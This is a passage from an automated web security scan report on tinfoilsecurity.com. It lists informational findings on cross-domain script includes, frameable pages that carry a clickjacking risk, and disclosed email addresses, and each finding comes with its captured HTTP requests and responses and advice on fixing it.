GET /pricing HTTP/1.1
Host: www.tinfoilsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20120524 Firefox/8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: https://www.tinfoilsecurity.com/users/login
Cookie: _tinfoil_app_session=BAh7B0kiD3Nlc3Npb25faWQGOgZFRkkiJTMwMjk1MTA1NzEyOWQwNDRjZTBkZWQ3NDY2OThlOTk2BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMWVxWXluWWZTYk5KM2hVVk8zZ2R0UGIvODIwZXhmOHFpdnE1SldHa1d2UVk9BjsARg%3D%3D--5c1a9193e57d0f179db22de2240a3cd38b29a8b6

Response

HTTP/1.1 200 OK
Cache-Control: must-revalidate, private, max-age=0
Content-Type: text/html; charset=utf-8
Date: Thu, 27 Sep 2012 17:39:31 GMT
Etag: "9427bd937c3b36e992fb734472abf075"
Server: thin 1.4.1 codename Chromeo
Set-Cookie: _tinfoil_app_session=BAh7B0kiD3Nlc3Npb25faWQGOgZFRkkiJTMwMjk1MTA1NzEyOWQwNDRjZTBkZWQ3NDY2OThlOTk2BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMWVxWXluWWZTYk5KM2hVVk8zZ2R0UGIvODIwZXhmOHFpdnE1SldHa1d2UVk9BjsARg%3D%3D--5c1a9193e57d0f179db22de2240a3cd38b29a8b6; path=/; secure; HttpOnly
Strict-Transport-Security: max-age=31536000
Vary: Accept-Encoding
X-Rack-Cache: miss
X-Request-Id: 7aa5b9bd6c008905e3fc38dc90588ea1
X-Runtime: 0.025884
X-Ua-Compatible: IE=Edge,chrome=1
Connection: keep-alive
Content-Length: 10868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head><script type="tex
...[SNIP]...
<link href="https://c387809.ssl.cf1.rackcdn.com/assets/application-external-35f7df5c5243acd09c822039d6b4a986.css" media="screen" rel="stylesheet" type="text/css" />
<script src="https://c387809.ssl.cf1.rackcdn.com/assets/application-external-6508873636c50de788d153e03567a806.js" type="text/javascript"></script>
...[SNIP]...

3.4. https://www.tinfoilsecurity.com/tour  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.tinfoilsecurity.com
Path:   /tour

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /tour HTTP/1.1
Host: www.tinfoilsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20120524 Firefox/8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: https://www.tinfoilsecurity.com/users/login
Cookie: _tinfoil_app_session=BAh7CEkiD3Nlc3Npb25faWQGOgZFRkkiJTMwMjk1MTA1NzEyOWQwNDRjZTBkZWQ3NDY2OThlOTk2BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMWVxWXluWWZTYk5KM2hVVk8zZ2R0UGIvODIwZXhmOHFpdnE1SldHa1d2UVk9BjsARkkiCmZsYXNoBjsARm86JUFjdGlvbkRpc3BhdGNoOjpGbGFzaDo6Rmxhc2hIYXNoCToKQHVzZWRvOghTZXQGOgpAaGFzaHsGOgphbGVydFQ6DEBjbG9zZWRGOg1AZmxhc2hlc3sGOwpJIh9JbnZhbGlkIGVtYWlsIG9yIHBhc3N3b3JkLgY7AFQ6CUBub3dvOiRBY3Rpb25EaXNwYXRjaDo6Rmxhc2g6OkZsYXNoTm93BjoLQGZsYXNoQAs%3D--019d16cebd48d4402740ffab9ba0a304a02e5fe4

Response

HTTP/1.1 200 OK
Cache-Control: must-revalidate, private, max-age=0
Content-Type: text/html; charset=utf-8
Date: Thu, 27 Sep 2012 17:42:14 GMT
Etag: "2b65d9ccecdb3c4eeecf419df65701e2"
Server: thin 1.4.1 codename Chromeo
Set-Cookie: _tinfoil_app_session=BAh7B0kiD3Nlc3Npb25faWQGOgZFRkkiJTMwMjk1MTA1NzEyOWQwNDRjZTBkZWQ3NDY2OThlOTk2BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMWVxWXluWWZTYk5KM2hVVk8zZ2R0UGIvODIwZXhmOHFpdnE1SldHa1d2UVk9BjsARg%3D%3D--5c1a9193e57d0f179db22de2240a3cd38b29a8b6; path=/; secure; HttpOnly
Strict-Transport-Security: max-age=31536000
Vary: Accept-Encoding
X-Rack-Cache: miss
X-Request-Id: 3c7e182debe17f882a12708f23ef8baf
X-Runtime: 0.016742
X-Ua-Compatible: IE=Edge,chrome=1
Connection: keep-alive
Content-Length: 12429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head><script type="tex
...[SNIP]...
<link href="https://c387809.ssl.cf1.rackcdn.com/assets/application-external-35f7df5c5243acd09c822039d6b4a986.css" media="screen" rel="stylesheet" type="text/css" />
<script src="https://c387809.ssl.cf1.rackcdn.com/assets/application-external-6508873636c50de788d153e03567a806.js" type="text/javascript"></script>
...[SNIP]...

3.5. https://www.tinfoilsecurity.com/users/login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.tinfoilsecurity.com
Path:   /users/login

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /users/login HTTP/1.1
Host: www.tinfoilsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20120524 Firefox/8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: https://www.tinfoilsecurity.com/
Cookie: _tinfoil_app_session=BAh7CEkiD3Nlc3Npb25faWQGOgZFRkkiJTMwMjk1MTA1NzEyOWQwNDRjZTBkZWQ3NDY2OThlOTk2BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMWVxWXluWWZTYk5KM2hVVk8zZ2R0UGIvODIwZXhmOHFpdnE1SldHa1d2UVk9BjsARkkiCmZsYXNoBjsARm86JUFjdGlvbkRpc3BhdGNoOjpGbGFzaDo6Rmxhc2hIYXNoCToKQHVzZWRvOghTZXQGOgpAaGFzaHsGOgplcnJvclQ6DEBjbG9zZWRGOg1AZmxhc2hlc3sGOwpJQzoeQWN0aXZlU3VwcG9ydDo6U2FmZUJ1ZmZlciICKAFTb3JyeSwgd2UgY2FuJ3Qgc2NhbiB0aGlzIFVSTC48YnIgLz5oaGhoaGguY29tIGlzIGludmFsaWQuPGJyIC8%2BSWYgeW91IGhhdmUgYW55IHF1ZXN0aW9ucyBvciBuZWVkIGFueSBoZWxwLCBmZWVsIGZyZWUgdG8gPGEgaHJlZj0iaHR0cDovL3N1cHBvcnQudGluZm9pbHNlY3VyaXR5LmNvbSI%2BcmVhZCBvdXIgRkFRPC9hPiwgPGEgaHJlZj0iL3N1cHBvcnRjaGF0Ij52aXNpdCBvdXIgc3VwcG9ydCBjaGF0PC9hPiwgb3IgPGEgaHJlZj0ibWFpbHRvOnN1cHBvcnRAdGluZm9pbHNlY3VyaXR5LmNvbSI%2BZW1haWwgdXM8L2E%2BLgc7AEY6D0BodG1sX3NhZmVUOglAbm93MA%3D%3D--2799446fbe2312d30d74a84cd3e647193a648df3

Response

HTTP/1.1 200 OK
Cache-Control: must-revalidate, private, max-age=0
Content-Type: text/html; charset=utf-8
Date: Thu, 27 Sep 2012 17:39:21 GMT
Etag: "bdbd73da655ef22ba7a891548f5f4bc5"
Server: thin 1.4.1 codename Chromeo
Set-Cookie: _tinfoil_app_session=BAh7B0kiD3Nlc3Npb25faWQGOgZFRkkiJTMwMjk1MTA1NzEyOWQwNDRjZTBkZWQ3NDY2OThlOTk2BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMWVxWXluWWZTYk5KM2hVVk8zZ2R0UGIvODIwZXhmOHFpdnE1SldHa1d2UVk9BjsARg%3D%3D--5c1a9193e57d0f179db22de2240a3cd38b29a8b6; path=/; secure; HttpOnly
Strict-Transport-Security: max-age=31536000
Vary: Accept-Encoding
X-Rack-Cache: miss
X-Request-Id: 82c30cdb46719cffa4a12564bef72a5a
X-Runtime: 0.023102
X-Ua-Compatible: IE=Edge,chrome=1
Connection: keep-alive
Content-Length: 9372

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head><script type="tex
...[SNIP]...
<link href="https://c387809.ssl.cf1.rackcdn.com/assets/application-external-35f7df5c5243acd09c822039d6b4a986.css" media="screen" rel="stylesheet" type="text/css" />
<script src="https://c387809.ssl.cf1.rackcdn.com/assets/application-external-6508873636c50de788d153e03567a806.js" type="text/javascript"></script>
...[SNIP]...

4. Frameable response (potential Clickjacking)  previous  next
There are 6 instances of this issue:

Issue description

It might be possible for a web page controlled by an attacker to load the content of this response within an iframe on the attacker's page. This may enable a "clickjacking" attack, in which the attacker's page overlays the target application's interface with a different interface provided by the attacker. By inducing victim users to perform actions such as mouse clicks and keystrokes, the attacker can cause them to unwittingly carry out actions within the application that is being targeted. This technique allows the attacker to circumvent defenses against cross-site request forgery, and may result in unauthorized actions.

Note that this issue is being reported because the application's response does not set a suitable X-Frame-Options header in order to prevent framing attacks. Some applications attempt to prevent these attacks from within the HTML page itself, using "framebusting" code. However, this type of defense is normally ineffective and can usually be circumvented by a skilled attacker.

Issue remediation

You should review the application functions that are accessible from within the response, and determine whether they can be used by application users to perform any sensitive actions within the application. If so, then a framing attack targeting this response may result in unauthorized actions.

To effectively prevent framing attacks, the application should return a response header with the name X-Frame-Options and the value DENY to prevent framing altogether, or the value SAMEORIGIN to allow framing only by pages on the same origin as the response itself.



4.1. https://www.tinfoilsecurity.com/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.tinfoilsecurity.com
Path:   /

Request

GET / HTTP/1.1
Host: www.tinfoilsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20120524 Firefox/8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: keep-alive

Response

HTTP/1.1 200 OK
Cache-Control: must-revalidate, private, max-age=0
Content-Type: text/html; charset=utf-8
Date: Thu, 27 Sep 2012 17:37:45 GMT
Etag: "65d9ae7a20e5be352e8b33e25c8811de"
Server: thin 1.4.1 codename Chromeo
Set-Cookie: _tinfoil_app_session=BAh7B0kiD3Nlc3Npb25faWQGOgZFRkkiJTMwMjk1MTA1NzEyOWQwNDRjZTBkZWQ3NDY2OThlOTk2BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMWVxWXluWWZTYk5KM2hVVk8zZ2R0UGIvODIwZXhmOHFpdnE1SldHa1d2UVk9BjsARg%3D%3D--5c1a9193e57d0f179db22de2240a3cd38b29a8b6; path=/; secure; HttpOnly
Strict-Transport-Security: max-age=31536000
Vary: Accept-Encoding
X-Rack-Cache: miss
X-Request-Id: 6adfef98b7981db6fd057ca672fe1eca
X-Runtime: 0.018001
X-Ua-Compatible: IE=Edge,chrome=1
Connection: keep-alive
Content-Length: 11144

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head><script type="tex
...[SNIP]...

4.2. https://www.tinfoilsecurity.com/about  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.tinfoilsecurity.com
Path:   /about

Request

GET /about HTTP/1.1
Host: www.tinfoilsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20120524 Firefox/8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: https://www.tinfoilsecurity.com/tour
Cookie: _tinfoil_app_session=BAh7B0kiD3Nlc3Npb25faWQGOgZFRkkiJTMwMjk1MTA1NzEyOWQwNDRjZTBkZWQ3NDY2OThlOTk2BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMWVxWXluWWZTYk5KM2hVVk8zZ2R0UGIvODIwZXhmOHFpdnE1SldHa1d2UVk9BjsARg%3D%3D--5c1a9193e57d0f179db22de2240a3cd38b29a8b6

Response

HTTP/1.1 200 OK
Cache-Control: must-revalidate, private, max-age=0
Content-Type: text/html; charset=utf-8
Date: Thu, 27 Sep 2012 17:42:17 GMT
Etag: "f1f3a1b178b3c15e9cc0e24eb6f50455"
Server: thin 1.4.1 codename Chromeo
Set-Cookie: _tinfoil_app_session=BAh7B0kiD3Nlc3Npb25faWQGOgZFRkkiJTMwMjk1MTA1NzEyOWQwNDRjZTBkZWQ3NDY2OThlOTk2BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMWVxWXluWWZTYk5KM2hVVk8zZ2R0UGIvODIwZXhmOHFpdnE1SldHa1d2UVk9BjsARg%3D%3D--5c1a9193e57d0f179db22de2240a3cd38b29a8b6; path=/; secure; HttpOnly
Strict-Transport-Security: max-age=31536000
Vary: Accept-Encoding
X-Rack-Cache: miss
X-Request-Id: 39a5948540de9cddfd7e80d6c8338644
X-Runtime: 0.010876
X-Ua-Compatible: IE=Edge,chrome=1
Connection: keep-alive
Content-Length: 9040

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head><script type="tex
...[SNIP]...

4.3. https://www.tinfoilsecurity.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.tinfoilsecurity.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.tinfoilsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20120524 Firefox/8.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Cookie: _tinfoil_app_session=BAh7B0kiD3Nlc3Npb25faWQGOgZFRkkiJTMwMjk1MTA1NzEyOWQwNDRjZTBkZWQ3NDY2OThlOTk2BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMWVxWXluWWZTYk5KM2hVVk8zZ2R0UGIvODIwZXhmOHFpdnE1SldHa1d2UVk9BjsARg%3D%3D--5c1a9193e57d0f179db22de2240a3cd38b29a8b6

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Thu, 27 Sep 2012 17:38:00 GMT
Server: thin 1.4.1 codename Chromeo
Strict-Transport-Security: max-age=31536000
Vary: Accept-Encoding
X-Rack-Cache: miss
X-Request-Id: 37f08869c530e19c9fdb48e30f94ceb8
X-Runtime: 0.008751
Connection: keep-alive
Content-Length: 2516

<!DOCTYPE html>
<html>
<head>
<title>The page you were looking for doesn't exist (404)</title>
<style type="text/css">
@font-face {
font-family: 'NewsCycleRegular';
src: url('/error_fonts/ne
...[SNIP]...

4.4. https://www.tinfoilsecurity.com/pricing  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.tinfoilsecurity.com
Path:   /pricing

Request

GET /pricing HTTP/1.1
Host: www.tinfoilsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20120524 Firefox/8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: https://www.tinfoilsecurity.com/users/login
Cookie: _tinfoil_app_session=BAh7B0kiD3Nlc3Npb25faWQGOgZFRkkiJTMwMjk1MTA1NzEyOWQwNDRjZTBkZWQ3NDY2OThlOTk2BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMWVxWXluWWZTYk5KM2hVVk8zZ2R0UGIvODIwZXhmOHFpdnE1SldHa1d2UVk9BjsARg%3D%3D--5c1a9193e57d0f179db22de2240a3cd38b29a8b6

Response

HTTP/1.1 200 OK
Cache-Control: must-revalidate, private, max-age=0
Content-Type: text/html; charset=utf-8
Date: Thu, 27 Sep 2012 17:39:31 GMT
Etag: "9427bd937c3b36e992fb734472abf075"
Server: thin 1.4.1 codename Chromeo
Set-Cookie: _tinfoil_app_session=BAh7B0kiD3Nlc3Npb25faWQGOgZFRkkiJTMwMjk1MTA1NzEyOWQwNDRjZTBkZWQ3NDY2OThlOTk2BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMWVxWXluWWZTYk5KM2hVVk8zZ2R0UGIvODIwZXhmOHFpdnE1SldHa1d2UVk9BjsARg%3D%3D--5c1a9193e57d0f179db22de2240a3cd38b29a8b6; path=/; secure; HttpOnly
Strict-Transport-Security: max-age=31536000
Vary: Accept-Encoding
X-Rack-Cache: miss
X-Request-Id: 7aa5b9bd6c008905e3fc38dc90588ea1
X-Runtime: 0.025884
X-Ua-Compatible: IE=Edge,chrome=1
Connection: keep-alive
Content-Length: 10868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head><script type="tex
...[SNIP]...

4.5. https://www.tinfoilsecurity.com/tour  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.tinfoilsecurity.com
Path:   /tour

Request

GET /tour HTTP/1.1
Host: www.tinfoilsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20120524 Firefox/8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: https://www.tinfoilsecurity.com/users/login
Cookie: _tinfoil_app_session=BAh7CEkiD3Nlc3Npb25faWQGOgZFRkkiJTMwMjk1MTA1NzEyOWQwNDRjZTBkZWQ3NDY2OThlOTk2BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMWVxWXluWWZTYk5KM2hVVk8zZ2R0UGIvODIwZXhmOHFpdnE1SldHa1d2UVk9BjsARkkiCmZsYXNoBjsARm86JUFjdGlvbkRpc3BhdGNoOjpGbGFzaDo6Rmxhc2hIYXNoCToKQHVzZWRvOghTZXQGOgpAaGFzaHsGOgphbGVydFQ6DEBjbG9zZWRGOg1AZmxhc2hlc3sGOwpJIh9JbnZhbGlkIGVtYWlsIG9yIHBhc3N3b3JkLgY7AFQ6CUBub3dvOiRBY3Rpb25EaXNwYXRjaDo6Rmxhc2g6OkZsYXNoTm93BjoLQGZsYXNoQAs%3D--019d16cebd48d4402740ffab9ba0a304a02e5fe4

Response

HTTP/1.1 200 OK
Cache-Control: must-revalidate, private, max-age=0
Content-Type: text/html; charset=utf-8
Date: Thu, 27 Sep 2012 17:42:14 GMT
Etag: "2b65d9ccecdb3c4eeecf419df65701e2"
Server: thin 1.4.1 codename Chromeo
Set-Cookie: _tinfoil_app_session=BAh7B0kiD3Nlc3Npb25faWQGOgZFRkkiJTMwMjk1MTA1NzEyOWQwNDRjZTBkZWQ3NDY2OThlOTk2BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMWVxWXluWWZTYk5KM2hVVk8zZ2R0UGIvODIwZXhmOHFpdnE1SldHa1d2UVk9BjsARg%3D%3D--5c1a9193e57d0f179db22de2240a3cd38b29a8b6; path=/; secure; HttpOnly
Strict-Transport-Security: max-age=31536000
Vary: Accept-Encoding
X-Rack-Cache: miss
X-Request-Id: 3c7e182debe17f882a12708f23ef8baf
X-Runtime: 0.016742
X-Ua-Compatible: IE=Edge,chrome=1
Connection: keep-alive
Content-Length: 12429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head><script type="tex
...[SNIP]...

4.6. https://www.tinfoilsecurity.com/users/login  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.tinfoilsecurity.com
Path:   /users/login

Request

GET /users/login HTTP/1.1
Host: www.tinfoilsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20120524 Firefox/8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: https://www.tinfoilsecurity.com/
Cookie: _tinfoil_app_session=BAh7CEkiD3Nlc3Npb25faWQGOgZFRkkiJTMwMjk1MTA1NzEyOWQwNDRjZTBkZWQ3NDY2OThlOTk2BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMWVxWXluWWZTYk5KM2hVVk8zZ2R0UGIvODIwZXhmOHFpdnE1SldHa1d2UVk9BjsARkkiCmZsYXNoBjsARm86JUFjdGlvbkRpc3BhdGNoOjpGbGFzaDo6Rmxhc2hIYXNoCToKQHVzZWRvOghTZXQGOgpAaGFzaHsGOgplcnJvclQ6DEBjbG9zZWRGOg1AZmxhc2hlc3sGOwpJQzoeQWN0aXZlU3VwcG9ydDo6U2FmZUJ1ZmZlciICKAFTb3JyeSwgd2UgY2FuJ3Qgc2NhbiB0aGlzIFVSTC48YnIgLz5oaGhoaGguY29tIGlzIGludmFsaWQuPGJyIC8%2BSWYgeW91IGhhdmUgYW55IHF1ZXN0aW9ucyBvciBuZWVkIGFueSBoZWxwLCBmZWVsIGZyZWUgdG8gPGEgaHJlZj0iaHR0cDovL3N1cHBvcnQudGluZm9pbHNlY3VyaXR5LmNvbSI%2BcmVhZCBvdXIgRkFRPC9hPiwgPGEgaHJlZj0iL3N1cHBvcnRjaGF0Ij52aXNpdCBvdXIgc3VwcG9ydCBjaGF0PC9hPiwgb3IgPGEgaHJlZj0ibWFpbHRvOnN1cHBvcnRAdGluZm9pbHNlY3VyaXR5LmNvbSI%2BZW1haWwgdXM8L2E%2BLgc7AEY6D0BodG1sX3NhZmVUOglAbm93MA%3D%3D--2799446fbe2312d30d74a84cd3e647193a648df3

Response

HTTP/1.1 200 OK
Cache-Control: must-revalidate, private, max-age=0
Content-Type: text/html; charset=utf-8
Date: Thu, 27 Sep 2012 17:39:21 GMT
Etag: "bdbd73da655ef22ba7a891548f5f4bc5"
Server: thin 1.4.1 codename Chromeo
Set-Cookie: _tinfoil_app_session=BAh7B0kiD3Nlc3Npb25faWQGOgZFRkkiJTMwMjk1MTA1NzEyOWQwNDRjZTBkZWQ3NDY2OThlOTk2BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMWVxWXluWWZTYk5KM2hVVk8zZ2R0UGIvODIwZXhmOHFpdnE1SldHa1d2UVk9BjsARg%3D%3D--5c1a9193e57d0f179db22de2240a3cd38b29a8b6; path=/; secure; HttpOnly
Strict-Transport-Security: max-age=31536000
Vary: Accept-Encoding
X-Rack-Cache: miss
X-Request-Id: 82c30cdb46719cffa4a12564bef72a5a
X-Runtime: 0.023102
X-Ua-Compatible: IE=Edge,chrome=1
Connection: keep-alive
Content-Length: 9372

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head><script type="tex
...[SNIP]...

5. Email addresses disclosed  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.tinfoilsecurity.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organization's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

Request

GET / HTTP/1.1
Host: www.tinfoilsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20120524 Firefox/8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: https://www.tinfoilsecurity.com/
Cookie: _tinfoil_app_session=BAh7CEkiD3Nlc3Npb25faWQGOgZFRkkiJTMwMjk1MTA1NzEyOWQwNDRjZTBkZWQ3NDY2OThlOTk2BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMWVxWXluWWZTYk5KM2hVVk8zZ2R0UGIvODIwZXhmOHFpdnE1SldHa1d2UVk9BjsARkkiCmZsYXNoBjsARm86JUFjdGlvbkRpc3BhdGNoOjpGbGFzaDo6Rmxhc2hIYXNoCToKQHVzZWRvOghTZXQGOgpAaGFzaHsAOgxAY2xvc2VkRjoNQGZsYXNoZXN7BjoKZXJyb3JJQzoeQWN0aXZlU3VwcG9ydDo6U2FmZUJ1ZmZlciICKAFTb3JyeSwgd2UgY2FuJ3Qgc2NhbiB0aGlzIFVSTC48YnIgLz5oaGhoaGguY29tIGlzIGludmFsaWQuPGJyIC8%2BSWYgeW91IGhhdmUgYW55IHF1ZXN0aW9ucyBvciBuZWVkIGFueSBoZWxwLCBmZWVsIGZyZWUgdG8gPGEgaHJlZj0iaHR0cDovL3N1cHBvcnQudGluZm9pbHNlY3VyaXR5LmNvbSI%2BcmVhZCBvdXIgRkFRPC9hPiwgPGEgaHJlZj0iL3N1cHBvcnRjaGF0Ij52aXNpdCBvdXIgc3VwcG9ydCBjaGF0PC9hPiwgb3IgPGEgaHJlZj0ibWFpbHRvOnN1cHBvcnRAdGluZm9pbHNlY3VyaXR5LmNvbSI%2BZW1haWwgdXM8L2E%2BLgc7AEY6D0BodG1sX3NhZmVUOglAbm93MA%3D%3D--15fa76da8c15544f242d54c340cd1b2ae36a696a
If-None-Match: "4f7ea94f6f4e69d51d6fe0cd0985e3ec"

Response

HTTP/1.1 200 OK
Cache-Control: must-revalidate, private, max-age=0
Content-Type: text/html; charset=utf-8
Date: Thu, 27 Sep 2012 17:39:13 GMT
Etag: "63cd40e8284850aae9bb4822f3f1fc9d"
Server: thin 1.4.1 codename Chromeo
Set-Cookie: _tinfoil_app_session=BAh7CEkiD3Nlc3Npb25faWQGOgZFRkkiJTMwMjk1MTA1NzEyOWQwNDRjZTBkZWQ3NDY2OThlOTk2BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMWVxWXluWWZTYk5KM2hVVk8zZ2R0UGIvODIwZXhmOHFpdnE1SldHa1d2UVk9BjsARkkiCmZsYXNoBjsARm86JUFjdGlvbkRpc3BhdGNoOjpGbGFzaDo6Rmxhc2hIYXNoCToKQHVzZWRvOghTZXQGOgpAaGFzaHsGOgplcnJvclQ6DEBjbG9zZWRGOg1AZmxhc2hlc3sGOwpJQzoeQWN0aXZlU3VwcG9ydDo6U2FmZUJ1ZmZlciICKAFTb3JyeSwgd2UgY2FuJ3Qgc2NhbiB0aGlzIFVSTC48YnIgLz5oaGhoaGguY29tIGlzIGludmFsaWQuPGJyIC8%2BSWYgeW91IGhhdmUgYW55IHF1ZXN0aW9ucyBvciBuZWVkIGFueSBoZWxwLCBmZWVsIGZyZWUgdG8gPGEgaHJlZj0iaHR0cDovL3N1cHBvcnQudGluZm9pbHNlY3VyaXR5LmNvbSI%2BcmVhZCBvdXIgRkFRPC9hPiwgPGEgaHJlZj0iL3N1cHBvcnRjaGF0Ij52aXNpdCBvdXIgc3VwcG9ydCBjaGF0PC9hPiwgb3IgPGEgaHJlZj0ibWFpbHRvOnN1cHBvcnRAdGluZm9pbHNlY3VyaXR5LmNvbSI%2BZW1haWwgdXM8L2E%2BLgc7AEY6D0BodG1sX3NhZmVUOglAbm93MA%3D%3D--2799446fbe2312d30d74a84cd3e647193a648df3; path=/; secure; HttpOnly
Strict-Transport-Security: max-age=31536000
Vary: Accept-Encoding
X-Rack-Cache: miss
